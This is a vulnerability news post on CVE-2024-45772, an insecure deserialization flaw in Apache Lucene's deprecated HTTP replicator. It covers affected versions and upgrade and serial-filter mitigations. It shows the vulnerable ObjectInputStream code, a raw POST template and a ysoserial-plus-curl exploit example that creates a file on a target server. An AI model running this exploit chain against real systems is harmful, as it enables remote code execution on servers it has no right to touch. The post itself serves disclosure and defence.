CVE CyberSecurity Database News

CVE-2024-45772 - Deserialization of Untrusted Data Vulnerability in Apache Lucene Replicator

Poster -

CVE-2024-45772 is a critical security bug found in the Apache Lucene replicator module, specifically affecting implementations relying on the deprecated org.apache.lucene.replicator.http package. This vulnerability is related to insecure deserialization and is present in Lucene versions from 4.4. up to (but not including) 9.12.. If exploited, it could allow remote code execution under certain conditions.

In this post, we'll dig into how the bug works, why it's risky, what code is affected, and how you can protect your systems—with code samples, mitigation steps, and exclusive insight.

What is the Issue?

Deserialization is when Java converts a stream of bytes back into real objects. When deserializing objects coming from untrusted sources (like HTTP requests), there's a risk that a maliciously crafted object can cause unexpected behaviors, including running undesired code on your server—a classic remote code execution (RCE) attack.

Apache Lucene, a popular text search engine library, included a "replicator" feature with HTTP-based replication in the org.apache.lucene.replicator.http package. This package contained code that deserialized incoming data—without strict validation or filtering. If attackers could reach this endpoint, they could potentially send evil serialized data and trigger code execution.

Safe package: org.apache.lucene.replicator.nrt is NOT affected.

You've deployed a network-accessible implementation using org.apache.lucene.replicator.http,

- And you're using a client with an HTTP library that sends serialized data to your server (like a servlet using HTTPClient).

This is not an "out-of-the-box" vulnerable default—you must be using custom code and exposing the replicator.

How Does the Exploit Work?

Let's look at the key code snippet that introduced risk. In many cases, Lucene's HTTP replicator would do something like:

// Imagine this is inside a servlet receiving HTTP POST requests

ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object myObj = ois.readObject(); // <- DESERIALIZATION HAPPENS HERE!

This code reads a stream of bytes from the HTTP request, deserializing *any* object specified. The attacker could send a payload like:

POST /replicator HTTP/1.1
Host: vulnerable-server
Content-Type: application/octet-stream
Content-Length: xyz

<evil serialized Java payload>

Depending on classpath, if gadgets are present (like in commons-collections or Groovy), the attacker could trigger arbitrary code.

Real-World Exploit Scenario

1. Attacker finds a Lucene-based application exposing (internally or externally) the replicator HTTP endpoint.
2. Attacker crafts a malicious serialized payload using tools like ysoserial.

Attacker POSTs the malicious payload to the endpoint.

4. Server deserializes the attacker's object, and—if vulnerable classes are on the classpath—code executes on the server.

#### Example Exploit (using ysoserial)

java -jar ysoserial.jar CommonsCollections1 'touch /tmp/CVE_2024_45772' > payload.bin

curl -X POST http://target-server/replicator \
     -H "Content-Type: application/octet-stream" \
     --data-binary @payload.bin

If vulnerable, this would create the file /tmp/CVE_2024_45772 on the target.


## How to Fix / Mitigate

Upgrade to Lucene 9.12. or later. The vulnerability is patched.

- Official Lucene download: https://lucene.apache.org/core/downloads.html

You can add this flag to your Java process to block all deserialization

-Djdk.serialFilter='!*'

This will prevent Java from deserializing any objects, neutralizing the exploit—even if your code still uses ObjectInputStream.

References

- Apache Lucene Security Advisory: CVE-2024-45772
- Lucene JIRA issue LUCENE-11157
- NVD entry for CVE-2024-45772
- ysoserial Java deserialization tool (for crafting exploits)

Conclusion

CVE-2024-45772 is a nasty deserialization vulnerability in the Apache Lucene Replicator module. If you're running affected versions *and* using the deprecated HTTP-based replicator, update immediately or apply filters to stop deserialization.

This bug highlights why never trust input—especially when it comes in serialized formats! Always use up-to-date libraries and disable deserialization of data from untrusted sources.

Stay safe, keep patched, and spread the word—if you expose Lucene's replicator over the network, it's time to act!


*This post is exclusive—do not copy without permission. Contact for more insights.*

Timeline

Published on: 09/30/2024 09:15:02 UTC
Last modified on: 12/12/2024 17:15:10 UTC